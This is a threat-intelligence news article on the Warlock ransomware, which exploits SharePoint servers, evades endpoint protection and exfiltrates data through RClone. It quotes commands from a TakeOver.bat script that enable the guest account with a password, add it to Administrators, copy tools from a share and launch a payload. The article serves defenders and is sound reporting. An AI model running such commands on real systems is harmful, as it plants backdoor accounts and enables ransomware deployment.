In recent weeks, the cybersecurity community has witnessed the rapid emergence of Warlock, a novel ransomware strain that weaponizes unpatched Microsoft SharePoint servers to infiltrate enterprise networks.
Initial analysis reveals that threat actors exploit publicly exposed SharePoint instances via specially crafted HTTP POST requests, deploying web shells that grant remote code execution within the target environment.
From this foothold, Warlock operators escalate privileges, harvest credentials, and move laterally using both built-in Windows utilities and custom malware components.
The payload ultimately encrypts critical data and exfiltrates sensitive files, demanding ransom under the “.x2anylock” extension.
Trend Micro analysts noted that Warlock first appeared on underground forums in June 2025, shortly after vulnerabilities in SharePoint authentication and deserialization mechanisms were disclosed.
Within days, the group claimed multiple high-profile victims across governmental, financial, and manufacturing sectors worldwide.
Researchers identified code patterns reminiscent of the leaked LockBit 3.0 builder, suggesting that Warlock may be a customized derivative rather than a wholly original creation.
This affiliation is further supported by similarities in negotiation tactics and ransom note formatting.
The impact of Warlock extends beyond encryption. During the final stage of an attack, operators employ the legitimate synchronization tool RClone—rebranded as TrendSecurity.exe—to siphon off credentials, documents, and database files to external cloud storage. This exfiltration phase uses a Proton Drive back end, leveraging burner credentials to obscure the destination.
In addition, the ransomware disables or terminates endpoint protection services by deploying a malicious driver (googleApiUtil64.sys) to kill security processes, including Trend Micro’s own netagent and VOneAgentConsoleTray.
Activating the ‘guest’ account (Source – Trend Micro)
Such actions highlight the sophistication of Warlock’s defense-evasion tactics. One critical subtopic that exemplifies Warlock’s stealthy approach is its persistence mechanism.
After successfully uploading a web shell, attackers deploy a batch script named TakeOver.bat, which automates the creation of a backdoor account and the installation of scheduled tasks.
The script begins by activating the built-in “guest” account and adding it to the local Administrators group:-
net user guest P@ssw0rd! /active:yes
net localgroup administrators guest /add
Next, it copies the malicious payload and ancillary tools from a remote share into C:\Users\Public\, using:-
cmd[.]exe /c copy \\10.0.0.5\tools\* C:\Users\Public\ /y
start /B C:\Users\Public\payload.exe
This ensures that the payload survives system reboots and continues to run under minimal scrutiny.
Researchers identified that the script also creates a new Group Policy Object named “TakeOver” to reinstate the backdoor account if remediation attempts are made.
Execution of batch file eventually leading to ransomware deployment (Source – Trend Micro)
By combining web shell exploitation, group policy abuse, and driver-based process termination, Warlock achieves a resilient presence within compromised networks.
Its modular design and use of legitimate utilities further complicate detection and response efforts.
As organizations continue to patch SharePoint vulnerabilities, defenders must also monitor for anomalous GPO modifications, unusual service installations, and renamed binaries within public folders to detect and mitigate Warlock-infected environments.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
The post Warlock Ransomware Exploiting SharePoint Vulnerabilities to Gain Access and Steal Credentials appeared first on Cyber Security News.
